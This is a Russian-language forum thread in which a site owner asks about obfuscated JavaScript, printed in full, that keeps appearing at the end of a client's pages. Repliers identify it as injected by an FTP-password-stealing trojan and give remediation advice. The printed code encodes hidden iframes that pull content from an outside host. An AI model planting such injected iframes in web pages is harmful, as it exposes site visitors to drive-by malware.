Форум Не про работу Самое разное

Вирус или непонятность?

[Удален]
507

Уже второй раз на сайте заказчика появляется вот такой вот кодик после </html>

<script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0064\u0065\u006c\u0074\u0061\u0068\u006f\u0073\u0074\u002e\u0062\u0069\u007a\u002f\u0074\u0064\u0073\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0030\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0030\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script><script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0064\u0065\u006c\u0074\u0061\u0068\u006f\u0073\u0074\u002e\u0062\u0069\u007a\u002f\u0074\u0064\u0073\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0030\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0030\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script><script>function v46efc63b60f09(v46efc63b616dd){ return(parseInt(v46efc63b616dd,16));}function v46efc63b62ec1(v46efc63b63619){ function v46efc63b64d88 () {return 2;} var v46efc63b63def='';for(v46efc63b645df=0; v46efc63b645df<v46efc63b63619.length; v46efc63b645df+=v46efc63b64d88()){ v46efc63b63def+=(String.fromCharCode(v46efc63b60f09(v46efc63b63619.substr(v46efc63b645df, v46efc63b64d88()))));}return v46efc63b63def;} document.write(v46efc63b62ec1('3C696672616D65206E616D653D27333430626363356327207372633D27687474703A2F2F64656C7461686F73742E62697A2F7464732F696672616D652E706870272077696474683D343032206865696768743D333531207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));</script>

Что это такое кто-нибудь знает? Вроде на вирус не похожено тем не менее неизвестно откуда появилось и неизвестно к чему это привязано...

Хелп плиз чёто у меня уже голова не соображает....

W
На сайте с 21.06.2006
Offline
19
webarray
#1

Это троян поселился на вашем компьютере.. Он лезет на хостинг через фтп и пишет этот код в конце html или php файла.

Проверьте антивирусом, и поменяйте пароли на FTP.

Данная тема поднималась не раз. В поиск.

LPS v1.1 - система оценки стоимости ссылки с сайта (http://www.openseo.ru/lps/) *новая версия PHP(ООП), MySQL: Cкрипты, Разработка CMS, Веб приложения, SEO сервисы.. (/ru/forum/160619) А Вы Яндекс? (http://www.openseo.ru)
перенос сайта с Тильды Все страницы сайта - Вопрос по php include
[Удален]
#2

Не нашёл ничего в поиске по этой теме... =(

T
На сайте с 11.08.2005
Offline
181
Timen
#3
Leonid.Sh:
Не нашёл ничего в поиске по этой теме... =(

Обычная история: троян увел ftp пароли и добавляет свой код на сайте (преимущественно в файлы index.*)

Решение: проверить компьютер на вирусы, изменить ftp пароли, не сохранять в дальнейшем пароли в ftp клиентах (или сохранять, добавляя лишний символ в любом месте).

Timen (http://www.timen.com.ua/)
[Удален]
#4

Спасибо! Примем меры ☝

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий